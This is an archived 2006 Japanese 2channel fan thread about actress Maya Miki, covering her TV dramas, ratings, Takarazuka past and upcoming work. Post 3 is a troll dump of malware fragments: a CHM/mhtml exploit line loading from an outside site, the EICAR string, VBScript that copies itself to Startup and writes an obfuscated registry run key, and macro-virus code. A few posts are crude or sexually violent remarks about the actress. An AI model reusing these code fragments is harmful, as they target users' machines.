5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

◆◇◆ 真矢みき Part9 ◆◇◆

1 :名無しさん@お腹いっぱい。:2006/10/29(日) 16:26:24 ID:89z2La3w
前スレ
http://tv7.2ch.net/test/read.cgi/actress/1152890386/

2 :名無しさん@お腹いっぱい。:2006/10/29(日) 16:33:07 ID:6t0sjPMN
2なら俺は鈴木亜美と結婚する

3 :<body onload=window()>:2006/10/29(日) 17:39:51 ID:N9m6y9zk
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

4 :名無しさん@お腹いっぱい。:2006/10/30(月) 04:05:12 ID:ckjh4Ft1
PMN

5 :名無しさん@お腹いっぱい。:2006/10/31(火) 02:06:30 ID:lt+qLJQi
PMN

6 :名無しさん@お腹いっぱい。:2006/11/01(水) 02:01:41 ID:M4cOOyxh
PMN

7 :名無しさん@お腹いっぱい。:2006/11/02(木) 00:20:43 ID:r95evxW2
PMN

8 :名無しさん@お腹いっぱい。:2006/11/03(金) 11:58:25 ID:Ac23vlG/
PMN

9 :名無しさん@お腹いっぱい。:2006/11/04(土) 00:23:37 ID:EcvTnwXM
>>3
氏ね

10 :名無しさん@お腹いっぱい。:2006/11/04(土) 08:48:09 ID:wu7nRzeA
『検事・霞 夕子SP』クランクアップ!!
ブログ更新

11 :名無しさん@お腹いっぱい。:2006/11/05(日) 02:07:13 ID:mR+eGdvG
『検事・霞 夕子SP』クランクアップ!!

12 :名無しさん@お腹いっぱい。:2006/11/05(日) 19:30:04 ID:CNIq1aBr
オmm

13 :名無しさん@お腹いっぱい。:2006/11/05(日) 19:31:44 ID:CNIq1aBr
オmm

14 :名無しさん@お腹いっぱい。:2006/11/06(月) 16:08:08 ID:nWw1nsS3
所属事務所公式
http://www.blooming-net.com/agency/index.html

真矢みき公式
http://www.blooming-net.com/agency/blog_info/mayamiki/index.html

真矢みきBLOG
http://www.blooming-net.com/agency/blog_artist/mayamiki/index.html

旧BLOG
http://blogs.yahoo.co.jp/mayamiki999/

15 :名無しさん@お腹いっぱい。:2006/11/07(火) 08:34:12 ID:OQbRKM/u
今日だー!

16 :名無しさん@お腹いっぱい。:2006/11/07(火) 09:24:34 ID:J7jn7lk0
私 北海道に住んでるんだけど新聞に、9時55分からは「笑ってコラえて」15時50分からは「どさんこワイド」って書いてるんだよね。
「ラジかるッ」と「donna」って北海道は見れないの?

17 :名無しさん@お腹いっぱい。:2006/11/07(火) 09:34:59 ID:LPaSUN77
月曜ゴールデンだったら良かったのに

11/06月
16.1% 21:00-22:54 TBS 月曜ゴールデン「弁護士・高見沢響子(8)」

18 :名無しさん@お腹いっぱい。:2006/11/07(火) 11:49:25 ID:QghJz2sX
ついにこの日が。
永かった・・約半月の禁オナ。
解禁日をなんとか無事に迎えることができた。
ここまで来たからには、夜本番まで待つか。

19 :名無しさん@お腹いっぱい。:2006/11/07(火) 14:30:27 ID:J7jn7lk0
みきさんオシャレでカッコよかった!
まだまだ入るね♪

20 :名無しさん@お腹いっぱい。:2006/11/07(火) 15:15:45 ID:q4RfIkts
おもいっきりテレビ約2時間録画して、出たの最後の約3分orz

21 :名無しさん@お腹いっぱい。:2006/11/07(火) 15:56:36 ID:qHKT+GOr
ザ・ワイド約2時間録画して、出たの最後の約3分
編集簡単すぎる・・・

22 :名無しさん@お腹いっぱい。:2006/11/07(火) 20:48:20 ID:epZcXV9n
なんか前スレの勢いが全くないね。
ダレも来なくなった。
ノートンユーザーってそんなに多いのか?
霞夕子、もうすぐ始まるよ!

23 :名無しさん@お腹いっぱい。:2006/11/07(火) 21:26:10 ID:J7jn7lk0
みきさん色っぽいよぉ〜!!!
最高だよぉ〜!!!
大好きだよッ♪

24 :名無しさん@お腹いっぱい。:2006/11/07(火) 23:03:50 ID:gnORX2kD
みきさん一日お疲れさん!
霞夕子前のとずいぶんかわったね〜。別物みたい。でも綺麗カコヨス☆
ずっと働きっぱなしだったから暫らくはゆっくり休んでまた元気な姿見せてネン。
とりあえず今日の分でなんとか年内燃料補給できそうかな…いや無理かw

25 :名無しさん@お腹いっぱい。:2006/11/07(火) 23:12:55 ID:EkpHW4Of
みきと和香
デカパイコンビやね。

26 :名無しさん@お腹いっぱい。:2006/11/07(火) 23:36:58 ID:QghJz2sX
無事、禁オナ解除できました。
思ってた以上にみきさん登場シーン多かったので、もう大変でした。
これで今夜からしばらくグッスリ眠れそうです。

27 :名無しさん@お腹いっぱい。:2006/11/08(水) 00:43:02 ID:mN9BGei7
みきさんの一言一言が
もうカッコィィもんね〜。
タバコを吸う、みきさん素敵だった!

28 :名無しさん@お腹いっぱい。:2006/11/08(水) 09:32:31 ID:FzluYHM8
12.8% 21:00-22:54 NTV 火曜ドラマゴールド「働く女のミステリー(2)検事・霞夕子SP!!」

29 :名無しさん@お腹いっぱい。:2006/11/08(水) 09:46:30 ID:DG62LLi2
>ノートンユーザーってそんなに多いのか?

バージョンによってはまったく見れない,,,,orz


30 :名無しさん@お腹いっぱい。:2006/11/08(水) 10:09:31 ID:6pudc1aE
まあまあの数字だと思わない?
先週にくらべればなんぼかマシでよかった。

31 :名無しさん@お腹いっぱい。:2006/11/08(水) 11:19:12 ID:mVQnTo8c
おーあの枠で二桁って久々じゃない?すごいじゃん。先週の倍近くある。
みきさんオメ!続編あるかもね。

32 :名無しさん@お腹いっぱい。:2006/11/08(水) 12:39:00 ID:yDea6OEJ
話の内容はイマイチだったけど、みきさん見たさで見た人多かったんじゃねーの?
みきさんの演技はなかなか楽しかった。
他のキャストも結構おもしろい俳優揃えてたし。
実況板でも和香よりみきハァハァ派が多かった。
髪束ねるシーン良かったわー(;´д`)ハァハァ

33 :LightCone ◆sSJBc30S5w :2006/11/08(水) 16:42:59 ID:ru0VjpC/
霞夕子 見ましたた.

>>32
髪束ねるシーン,確かにもの凄くよかった.


アテプリ見てから,真矢みきさんのファンになってしまったオイラです.

34 :名無しさん@お腹いっぱい。:2006/11/09(木) 08:50:13 ID:m1W83+1q
今回の霞夕子も好きだけどもう少し正統派な霞夕子もみきさんで見てみたかったなあ。
三神教官のような冷静沈着クールビューティなテイストで。
和香ちゃんとのコンビかわいくて好き。背高いんだね。二人ともナイスバディーw

35 :名無しさん@お腹いっぱい。:2006/11/09(木) 18:56:13 ID:eJ4pzMYR
声が良いよね、キリッとしてて外見や雰囲気とぴったりマッチ

そぅ考えると米倉涼子は声で大分損したと思う

36 :名無しさん@お腹いっぱい。:2006/11/09(木) 21:07:33 ID:xZUy3wZo
前は米倉涼子だったの?

37 :名無しさん@お腹いっぱい。:2006/11/10(金) 00:06:38 ID:rCaUWnbA
みきさん、綺麗・かっこいい・おもしろい

38 :名無しさん@お腹いっぱい。:2006/11/10(金) 22:26:52 ID:nGXh05cl
ザッツレビューというのを見たよ。春風泰平さんいいね。
三枚目だけどかっこよくて超タイプ!土方姿で腹巻まいてたw

39 :名無しさん@お腹いっぱい。:2006/11/11(土) 01:20:54 ID:y+zfV17B
みきさんて宝塚時代も天然ちゃんだった?

40 :名無しさん@お腹いっぱい。:2006/11/11(土) 13:55:52 ID:/PpOEkCF
自分の地域ではたった今放送終わりました。
<霞夕子@南の方
みきさんカッコヨカタ
(;´Д`)

41 :名無しさん@お腹いっぱい。:2006/11/11(土) 15:57:54 ID:KcTJxU6y
39>>
天然ちゃんだったし、かっこいいだけでは終わらない人だった。
しゃべってて、何の話だっけ?とか、
白いスーツでバリッと楽屋出たとたん走ってきたタクシーに
雨水はねられて大リアクションとって大爆笑とか。

42 :名無しさん@お腹いっぱい。:2006/11/11(土) 17:02:34 ID:8V7Rf+OU
みきさんてやっぱりかわいいー!大好き!

43 :名無しさん@お腹いっぱい。:2006/11/11(土) 22:37:55 ID:y+zfV17B
今日みきさんOGの方達と星組を観劇したみたいだね。
宝塚よく見に行くのかな?

44 :名無しさん@お腹いっぱい。:2006/11/11(土) 23:35:38 ID:8V7Rf+OU
ブログで時々目撃情報見かけるからよく通ってるんじゃないかな?
みきさん今でも宝塚大好きなんだね。

45 :名無しさん@お腹いっぱい。:2006/11/12(日) 13:49:46 ID:32OnrMKI
『アテンションプリーズ SP』
2007年1月放送

情報ソース
http://sunmusic.org/production/misaki_momose.htm

46 :名無しさん@お腹いっぱい。:2006/11/12(日) 14:45:27 ID:hFmH8RO/
真矢みきはスーツが似合うな。
スカートもいいがパンツもいける。

47 :名無しさん@お腹いっぱい。:2006/11/12(日) 15:20:31 ID:yMsHIgEg
私はジーパン姿の みきさんが好き☆
アテプリSPやるの?
めっちゃ嬉しいんだけどーー!

48 :名無しさん@お腹いっぱい。:2006/11/12(日) 15:40:34 ID:9dQTf7AH
心身ともに綺麗な人は何着ても似合うものだ

49 :名無しさん@お腹いっぱい。:2006/11/13(月) 07:08:05 ID:KU+QAqIW
アテプリSPみきさん出演するね。今日から撮影開始で来年1月放送だって。
三神教官再び!みきさん大忙しだ。

50 :名無しさん@お腹いっぱい。:2006/11/13(月) 09:20:37 ID:HcNjB3Wb
みきさんも出演するんだ、楽しみ☆

51 :名無しさん@お腹いっぱい。:2006/11/13(月) 12:32:43 ID:HcNjB3Wb
みきさんのフラダンスは刺激が強すぎる☆カナ
http://hochi.yomiuri.co.jp/entertainment/news/20061113-OHT1T00066.htm

52 :名無しさん@お腹いっぱい。:2006/11/13(月) 12:40:46 ID:KU+QAqIW
みきさんお気に入りの彩ちゃんとの再開うれしいだろうな。

53 :名無しさん@お腹いっぱい。:2006/11/13(月) 21:35:41 ID:3UorIJR2
アテプリSPやるって、まだ知らない方が良かったかも…。
見たくて見たくて仕方がない!

54 :名無しさん@お腹いっぱい。:2006/11/13(月) 21:48:59 ID:h9O6OPCN
ウエラトーン2プラス1の新CM、のだめカンタービレ見てたら流れた。
ちょww録画・・・と思ってリモコン握ったら終わってた。
ウエラ、いつスポンサーに付くか読めん企業だ・・・。

55 :名無しさん@お腹いっぱい。:2006/11/14(火) 04:55:56 ID:WGTpCGRy
真矢姉さんカッコヨス
上司になってほしい


56 :名無しさん@お腹いっぱい。:2006/11/15(水) 07:07:58 ID:utn4no/I
ヅカヲタと思われる人のブログで我らがみき様がこきおろされてる〜。
すごい意地悪だ。

57 :名無しさん@お腹いっぱい。:2006/11/15(水) 07:48:05 ID:9ucZeHgA
あーそいつアテプリの時もこきおろしてたな。
他があまりにも好評の中でういてたんで覚えていたさ。
おもいっきり誰かさんのヲタ目線なんだよ。
素直に今の活躍が疎ましいと書けよなまったく。


58 :名無しさん@お腹いっぱい。:2006/11/15(水) 11:48:14 ID:QPUxID+d
アテプリの成功は素直にみき様のお陰だよ
火【21】アテンション.  17.7__14.9__16.8__16.0__15.7__15.3__15.4__16.9__15.7__19.2__16.5(終).__________16.37


真矢みき鬼教官役は大人の醍醐味…新人CA上戸彩をビシビシ鍛える
http://hochi.yomiuri.co.jp/entertainment/news/20060602-OHT1T00050.htm

59 :名無しさん@お腹いっぱい。:2006/11/16(木) 03:54:09 ID:OPT9mKc4
ちょっと失礼。

みきさん大好き!!!

ぁあ〜スッキリした♪
何か急に叫びたくなったもんで…。

60 :名無しさん@自治スレで板設定値議論中:2006/11/17(金) 21:25:59 ID:6NZibVBM
公式みてみー

61 :名無しさん@自治スレで板設定値議論中:2006/11/17(金) 23:42:10 ID:5x8KBaNL
見たが、何か?

62 :名無しさん@自治スレで板設定値議論中:2006/11/18(土) 13:41:43 ID:S7wUgbgV
霞夕子見てファンになりました。
カッコ良すぎ!
で、宝塚に詳しい人、教えてほしいのですが、
真矢さんは宝塚ではどの位のスターだったのですか?
もちろん男役だとは思いますが、私の知識では大地真央と天海祐希さんは
トップ中のトップの大スターだったと聞いたことがある・・。
真矢さんもそれに匹敵するくらい人気あったのかな??
ついでに涼風真世さんはどうだったんでしょうか。

63 :名無しさん@自治スレで板設定値議論中:2006/11/18(土) 17:38:12 ID:uk8hucau
公式に追加されてる番組って中国ロケのやつかな?てか2月ってまだまだだよ…。

64 :名無しさん@自治スレで板設定値議論中:2006/11/18(土) 19:43:35 ID:mV46r3+D
久しぶりアンチ来場かw。相変わらずだな〜


65 :名無しさん@自治スレで板設定値議論中:2006/11/18(土) 22:56:46 ID:9XjmJ5fK
APスペシャルドラマ、1月放送決定!
 無事訓練所を卒業したものの、相変わらずの破天荒ぶりを繰り広げている
美咲洋子が、今度は国際線の訓練として、ハワイ・ホノルル便のOJTでトラブ
ルを巻き起こす!?今回、美咲洋子が行うのは「国際線移行訓練」。教官は
やはり三神教官(真矢みき)。

上戸彩さん演じるキャビンアテンダント・ヒロイン美咲洋子の“復活”です。
真矢みきさん演じる三神教官との対立、錦戸亮さん演じる翔太との恋の行方な
ど、連続ドラマよりパワーアップしてお送りします。相武紗季さん、小泉孝太
郎さんほか、レギュラー陣も勢ぞろい。国際線に舞台を移し訓練の厳しさを学
びながらも、フライト地のハワイで美咲洋子が大活躍します。ご期待ください。

66 :名無しさん@自治スレで板設定値議論中:2006/11/18(土) 23:22:10 ID:D13VgVI0
三神教官と美咲洋子また仲悪くなるの?
せっかく最終回いい感じで終わったのにね。
しかも またトラブル起こすのか…。
でも楽しみだわ!

67 :名無しさん@自治スレで板設定値議論中:2006/11/19(日) 01:02:40 ID:gPMkYx3Z
霞夕子でみき切れ回復、さすが主演で出番多すぎてみき貯めした
今日この頃、みきファンのみなさまいかがお過ごしですか?
霞夕子の編集には手間がかかったわい。
久々にうpすっぞ!ハイ、すっぞ!
ttp://imepita.jp/trial/20061119/033070
ttp://imepita.jp/trial/20061119/033200
ttp://imepita.jp/trial/20061119/033310
ttp://imepita.jp/trial/20061119/033460
ttp://imepita.jp/trial/20061119/033600

68 :名無しさん@自治スレで板設定値議論中:2006/11/19(日) 01:09:41 ID:gPMkYx3Z
続き
ttp://imepita.jp/trial/20061119/038390
ttp://imepita.jp/trial/20061119/038430
ttp://imepita.jp/trial/20061119/038550
ttp://imepita.jp/trial/20061119/038770
ttp://imepita.jp/trial/20061119/038800
ttp://imepita.jp/trial/20061119/038920

69 :名無しさん@自治スレで板設定値議論中:2006/11/19(日) 01:11:06 ID:f0KPaX06
67サマいつもありがとう。
いや〜みきさん美しい〜色っぽい〜かっこいいホント惚れますわw

70 :名無しさん@自治スレで板設定値議論中:2006/11/19(日) 01:12:15 ID:gPMkYx3Z
おまけ 「さとみちゃ〜ん、トップ独走じゃな〜い」
ttp://imepita.jp/trial/20061119/039040
ttp://imepita.jp/trial/20061119/039170
ttp://imepita.jp/trial/20061119/039510

71 :名無しさん@自治スレで板設定値議論中:2006/11/19(日) 03:24:40 ID:91M0putY
画像ありがとうございますッm(__)mホント、いつもいつもご苦労さまデス。(・∀・)

72 :名無しさん@お腹いっぱい。:2006/11/19(日) 03:55:29 ID:KvloPdqq
女優さんも数多く居るけど
やはり宝塚の男役トップスターは品があって素敵だね
>>真矢さんは宝塚ではどの位のスターだったのですか?
花組の男役トップスターでしたよ。黒木瞳さんと同期


73 :名無しさん@自治スレで板設定値議論中:2006/11/19(日) 12:23:57 ID:Pm6NiEO2

上戸彩さん演じるキャビンアテンダント・ヒロイン美咲洋子の“復活”です。
真矢みきさん演じる三神教官との対立、錦戸亮さん演じる翔太との恋の行方な
ど、連続ドラマよりパワーアップしてお送りします。

74 :名無しさん@自治スレで板設定値議論中:2006/11/19(日) 12:24:41 ID:Pm6NiEO2
2006/2/4(日)15:00〜16:25 日本テレビ系「いのち〜永遠への道〜」不老不死を求めた人類の足跡を辿り、歴史、最先端科学、そして生命の神秘に迫ります。ご期待ください。

75 :名無しさん@自治スレで板設定値議論中:2006/11/19(日) 12:51:53 ID:Pm6NiEO2
画像ありがと

76 :名無しさん@自治スレで板設定値議論中:2006/11/19(日) 13:24:37 ID:RSFDfsbX
画像なら熟女板にもありますよ

【★☆★ 真矢みき ★☆★ part2】
http://sakura02.bbspink.com/test/read.cgi/mature/1156609447/

77 :名無しさん@自治スレで板設定値議論中:2006/11/19(日) 14:23:17 ID:RYN7HblX
第一生命のCMいいよな人妻風で
ああいうのを犯したい

78 :名無しさん@自治スレで板設定値議論中:2006/11/19(日) 15:42:08 ID:U5aBnfc1
みきさんと和香ちゃんがクッキー食べてる場面での
「彼氏と上手くいってんのか?」とか「無視かよっ」ってセリフが好きだな(笑)

79 :名無しさん@自治スレで板設定値議論中:2006/11/20(月) 14:36:29 ID:KoBu2Nlq
フジテレビ系連続ドラマ「ヒミツの花園(仮)」出演!

2007年1月スタート フジテレビ系連続ドラマ「ヒミツの花園(仮)」(火曜22:00〜 初回1/9)へに出演が決定いたしました!
出版社を舞台に繰り広げられるコメディーです!
詳しい情報は追ってご連絡いたします。どうぞお楽しみに!

80 :名無しさん@お腹いっぱい。:2006/11/20(月) 15:15:33 ID:v3nzL0vE
釈由美子がコメディー初挑戦!火10で連ドラ新境地開く!
http://www.sanspo.com/geino/top/gt200611/gt2006112002.html

81 :名無しさん@自治スレで板設定値議論中:2006/11/20(月) 17:09:42 ID:zNCM804i
正直あまり興味ひかれない…。今朝ワイドショーで見てこれは見ないなって思ってたら…。
アテプリSPの方が楽しみだけど蓋をあければ面白かったってなるといいね…。

82 :名無しさん@お腹いっぱい。:2006/11/20(月) 18:09:58 ID:v3nzL0vE
花より男子の大人版かな
台湾版のタイトルは流星花園だしね

83 :名無しさん@自治スレで板設定値議論中:2006/11/20(月) 20:38:48 ID:KoBu2Nlq
アテプリも興味ひかれなかったが
蓋をあければ面白かった

84 :名無しさん@自治スレで板設定値議論中:2006/11/20(月) 21:23:19 ID:VtDethO8
火曜ってことは、その時期は霞夕子ないね…。まぁそんなに早く続編やらないとは思うが。

85 :名無しさん@自治スレで板設定値議論:2006/11/21(火) 01:12:36 ID:CfJqLvNC
画像をダウンロードすると途中まで
しかでないのはなんで?

86 :名無しさん@自治スレで板設定値議論中:2006/11/21(火) 08:06:13 ID:oXgkidBk
>>85
ケータイだから

87 :名無しさん@自治スレで板設定値議論中:2006/11/21(火) 19:33:20 ID:+SXQI23L
私フツーに見れるけど。
あ〜でもPCで見れたらな〜。

88 :名無しさん@自治スレで板設定値議論中:2006/11/23(木) 12:15:48 ID:f+7zQu9o
みきさん霞でだいぶすっきりしてたけどそれ以上は痩せないでね。ブクブク太るのもヤダよ。
今ぐらいがちょうどいいよ。夏着てたCA制服ワンサイズ変わってそう。

89 :名無しさん@自治スレで板設定値議論中:2006/11/23(木) 15:02:43 ID:fjaM8hl1
ダイエット禁止令くだる

90 :名無しさん@自治スレで板設定値議論中:2006/11/24(金) 11:30:06 ID:sN1PEEDz
川沿い走ったりしたのかな(笑)

91 :名無しさん@自治スレで板設定値議論中:2006/11/24(金) 11:57:35 ID:Ysmn+VHT
おっ、Qさまだw
三神教官のおだんごどんなになってるかな?髪伸びたもんね、みきさん。
ロングヘアのポニーテール似合ってた。

92 :名無しさん@自治スレで板設定値議論中:2006/11/24(金) 21:05:41 ID:sN1PEEDz
みきさん髪切りたくないのかな?
長い方がいろんな髪型できるけど、私は長くしてると邪魔で嫌だから、あんまり伸ばしたことないんだよね。
宝塚時代も長かったんだっけ?

93 :名無しさん@自治スレで板設定値議論中:2006/11/25(土) 11:30:41 ID:GQgJyKID
うん、宝塚時代も長かったよ。

94 :名無しさん@自治スレで板設定値議論中:2006/11/25(土) 12:21:33 ID:/c93CUDa
いや男役だから。

95 :名無しさん@自治スレで板設定値議論中:2006/11/25(土) 12:21:51 ID:yCFpyraD

2007年2月4日(日)15:00〜16:25 日本テレビ系「いのち〜永遠への道〜」
2007年1月 フジテレビ系「アテンションプリーズSP」が放送決定!三神教官が帰ってきます!詳しい日時は追ってご連絡いたします。どうぞお楽しみに!
2007年1月スタート(火曜22:00〜、初回1/9) フジテレビ系連続ドラマ「ヒミツの花園(仮)」出演決定!

96 :名無しさん@自治スレで板設定値議論中:2006/11/25(土) 22:11:50 ID:kTDpWS4u
>94
男役でも最後は長かった。

97 :名無しさん@自治スレで板設定値議論中:2006/11/26(日) 13:00:08 ID:qJYUnXOW
みきさん たまに男役っぽい声や仕草が出るね。

98 :名無しさん@自治スレで板設定値議論中:2006/11/26(日) 17:58:09 ID:XyHkQ7eX
長年かかって身につけたものはそう簡単にとれやしないよ。
それもみきさんの個性。経験つんで徐々に自然になっていけばいいさ!

99 :名無しさん@お腹いっぱい。:2006/11/27(月) 20:49:51 ID:A1Jof3Kr
アテプリSP

本日ハワイ到着、12月4日まで滞在の情報

100 :名無しさん@お腹いっぱい。:2006/11/27(月) 21:37:56 ID:A1Jof3Kr
100みきさん

101 :名無しさん@自治スレで板設定値議論中:2006/11/28(火) 14:15:03 ID:jIOTjAl8
日本と言う同じ場所に居ないと思うと、なんだか淋しい…。

102 :名無しさん@自治スレで板設定値議論中:2006/11/29(水) 06:30:01 ID:YQ6mkMiR
みきまだか〜?

103 :名無しさん@自治スレで板設定値議論中:2006/11/29(水) 14:59:20 ID:/0Dbj8Eo
一月まで何もテレビに出ないのかな?ウルルンとか。

104 :名無しさん@お腹いっぱい。:2006/11/29(水) 15:16:13 ID:He+S2qGP
アテプリの番宣絡みで出て欲しいね

105 :名無しさん@自治スレで板設定値議論中:2006/11/29(水) 16:07:49 ID:5q4szRme
上げ上げ!

106 :名無しさん@自治スレで板設定値議論中:2006/11/29(水) 18:35:26 ID:vap6t91V
ハワイにいることしか情報がないなんてつまんないよ、みきさ〜ん
早くみきさん見たいよ

107 :名無しさん@自治スレで板設定値議論中:2006/11/29(水) 20:26:10 ID:FDxXQmK4
今日、FCのスタッフさんと会って会報の仕事してたようだよ。
もう帰ってきたってことかな?

108 :名無しさん@自治スレで板設定値議論中:2006/11/30(木) 01:12:32 ID:q83IDqcI
なに情報?

109 :名無しさん@自治スレで板設定値議論中:2006/11/30(木) 01:21:27 ID:p2lqTWay
スタッフさんのブログ更新されてたね。そこ見るといいよ。
旅番組でのエピソードや子供達とのふれあいを嬉しそうに話してる姿が目に浮かぶw
会報が楽しみだ。早く来ないかな〜。

110 :名無しさん@自治スレで板設定値議論中:2006/11/30(木) 04:18:03 ID:q83IDqcI
見て来た♪♪

ありがとう☆

111 :名無しさん@自治スレで板設定値議論中:2006/11/30(木) 07:58:55 ID:wHaouQbt
無事帰ってきたかヨシヨシ

112 :名無しさん@自治スレで板設定値議論中:2006/11/30(木) 22:37:09 ID:+IFU9DBs
みきさんが宝塚のときのさよなら公演かな?のビデオ見たのですが、いやぁ―ッすごい!!カッコイイ(゚∀゚)おすすめです。

113 :名無しさん@自治スレで板設定値議論中:2006/12/01(金) 14:23:44 ID:OLPr7a4i
見たーい!!!
みんな泣いてた?

114 :名無しさん@自治スレで板設定値議論中:2006/12/01(金) 15:21:40 ID:Wj+sgBFw
私も当時のビデオ色々買いあさって何回も見たよ。
宝塚時代のみきさん見るとあまりの男っぷりにびっくりするよね。
今じゃすっかり素敵なお姉様なのにねw

115 :名無しさん@自治スレで板設定値議論中:2006/12/01(金) 20:18:31 ID:44BPOPuD
ですよねー(>∀<)ほんと男っぽいッ!!サヨナラ公演の最後に、下級生さんたちが歌を歌ってるんですけど、みなさん号泣でしたね…(T_T)みきサン愛されてるなぁ〜って思いました。

116 :名無しさん@自治スレで板設定値議論中:2006/12/01(金) 22:14:13 ID:OLPr7a4i
存在感あるよねぇ〜☆

117 :名無しさん@自治スレで板設定値議論中:2006/12/02(土) 21:00:42 ID:hT2SOZx+
みきを見せろ

118 :名無しさん@自治スレで板設定値議論中:2006/12/03(日) 07:51:16 ID:/iUoPN27
真矢みきのウンコだったら食えるというかぜひ食いたい。そのくらい魅力的。

119 :名無しさん@自治スレで板設定値議論中:2006/12/04(月) 00:10:19 ID:CHVyaU/E
みきさぁ〜ん!!!

о(T□T)о

120 :名無しさん@自治スレで板設定値議論中:2006/12/04(月) 09:50:03 ID:pTKa/7RH
今日成田行ったら見れるかな
帰ってくるんだよね?

121 :名無しさん@自治スレで板設定値議論中:2006/12/04(月) 10:25:37 ID:Z0i3IXu+
お前ら笛吹さん好きだろ? 

122 :名無しさん@自治スレで板設定値議論中:2006/12/04(月) 11:18:32 ID:YUEgkwRQ
あれ?もう帰ってきてるんじゃなかったっけ?

てかみきさんテレビまぁだあ〜↑
1月まで待てないよ〜ん
ウルルンこ〜いこい♪

123 :名無しさん@自治スレで板設定値議論中:2006/12/04(月) 12:49:06 ID:YZN2DcCI
>>121
うむ。好きだ。
なんでバレた?

124 :名無しさん@自治スレで板設定値議論中:2006/12/04(月) 20:02:50 ID:ypJUcgNw
ごめん。笛吹さんて誰?

125 :名無しさん@自治スレで板設定値議論中:2006/12/04(月) 20:32:23 ID:YUEgkwRQ
日テレのアナウンサーかな?意味わかんない。

126 :名無しさん@自治スレで板設定値議論中:2006/12/04(月) 21:52:01 ID:F6MzIBvm
男ならわかる。
真矢さん好きなヤツは、笛吹さんもストライクゾーン。

127 :名無しさん@自治スレで板設定値議論中:2006/12/05(火) 11:18:52 ID:ecebZ4Tg
雰囲気が似てるとか?
巨乳なの?その人。

128 :名無しさん@自治スレで板設定値議論中:2006/12/05(火) 14:54:53 ID:+QV7pXXd
残念ながら貧乳らしい。
日テレの夕方のニュースでメインキャスターやってるよ。
みきさんも笛吹さんも、色気熟女ハッキリ顔お姉さま系仕事できる実は優しい天然女ってとこかな。
仕事ではピシッとしてて、バラエティーではやさしい笑顔、このギャップも好き。

129 :名無しさん@自治スレで板設定値議論中:2006/12/05(火) 18:11:07 ID:rP8NkG9O
悪いことは叱ってくれそうなお姉さんてかんじなのかな。
あとは早口でハキハキしゃべるってことぐらいしか思いつかない。
よく分からないけど男の人から見たら共通のツボがあるんだろうね。

130 :名無しさん@自治スレで板設定値議論中:2006/12/05(火) 21:27:59 ID:m3+i2VJL
お前ら雅子さま好きだろ?

131 :名無しさん@自治スレで板設定値議論中:2006/12/05(火) 21:57:19 ID:GeJeVvQU
>>130
うむ。好きだ。
なんでまたバレた?

132 :名無しさん@自治スレで板設定値議論中:2006/12/06(水) 01:00:48 ID:ma10ib5W
私雅子さまに似てるって言われるよ。

いい加減みき様カモ〜ン!

133 :名無しさん@お腹いっぱい。:2006/12/06(水) 10:23:58 ID:YP4SG9eg
絶対一月まで何にも
出演しない気がする…

134 :名無しさん@お腹いっぱい。:2006/12/06(水) 11:06:36 ID:jOeUAGq6
みきさんて、どこに帰省すんだろ?

135 :名無しさん@お腹いっぱい。:2006/12/06(水) 21:25:40 ID:cHmMJQqd
東京じゃね?

136 :名無しさん@お腹いっぱい。:2006/12/07(木) 17:28:09 ID:+IY5dVMZ
ついに学会に・・・・・・



だからだったのね・・・・・・・・・

137 :名無しさん@お腹いっぱい。:2006/12/07(木) 22:47:47 ID:kaJDLTnp
そうか、そうかw












さて。そろそろブログ更新しないとおしおきですわよーっ!!!

138 :名無しさん@お腹いっぱい。:2006/12/08(金) 00:37:41 ID:+/rPCtKN
え?みきちゃんて学会なの?

139 :名無しさん@お腹いっぱい。:2006/12/08(金) 00:44:06 ID:L6Uk6w+M
違うでしょw

140 :名無しさん@お腹いっぱい。:2006/12/08(金) 03:23:25 ID:PateF3Y6
創価学会って、どーゆーものなの?
普通と違うみたいな?

141 :名無しさん@お腹いっぱい。:2006/12/08(金) 07:53:57 ID:GyQsW2h2
真矢ミッキーまだかよ

142 :名無しさん@お腹いっぱい。:2006/12/08(金) 13:48:40 ID:5V5SV2SJ
アテプリSPの放送日が発表されました
1月13日土曜日

143 :名無しさん@お腹いっぱい。:2006/12/09(土) 02:21:36 ID:vGDTdrUg
今の世の中、知らなきゃ知らないほうが幸せなことも多々あるわけで・・・

今の芸能界で生き残ってくためには・・・

だって、今の宝塚は・・・

144 :名無しさん@お腹いっぱい。:2006/12/09(土) 03:44:10 ID:F77+kc4K
はいはい。あなたでしたか。
いちいち真矢スレに来ないでちょーだい。何か勘違いしてません?
存在や仕事ぶりが目障りだから某さんだけじゃなくみきさんもターゲットですか?
はっきり言っていいかげんなカキコで貶めようとしたって意味ないです。
贔屓以外はそうやって徹底排除したいんでしょうが。
ネガティブな活動ばっかしてるとそのうち自分にかえってきますよ。

あ、この人しつこいですけど以後スルーでヨロシク!

145 :名無しさん@お腹いっぱい。:2006/12/09(土) 03:45:33 ID:IaId8IGi
1月13日の裏ドラマ

NHK ちゅらさん4(連ドラ初回)
日テレ 演歌の女王(連ドラ初回)
テレ朝 ?

146 :名無しさん@お腹いっぱい。:2006/12/09(土) 08:32:58 ID:cjV5r54p
そろそろヒミツの花園の撮影にはいる頃か?
とうやら今月の露出はなさそうだな。
みきを見ずに年越しとは寂しいのお。

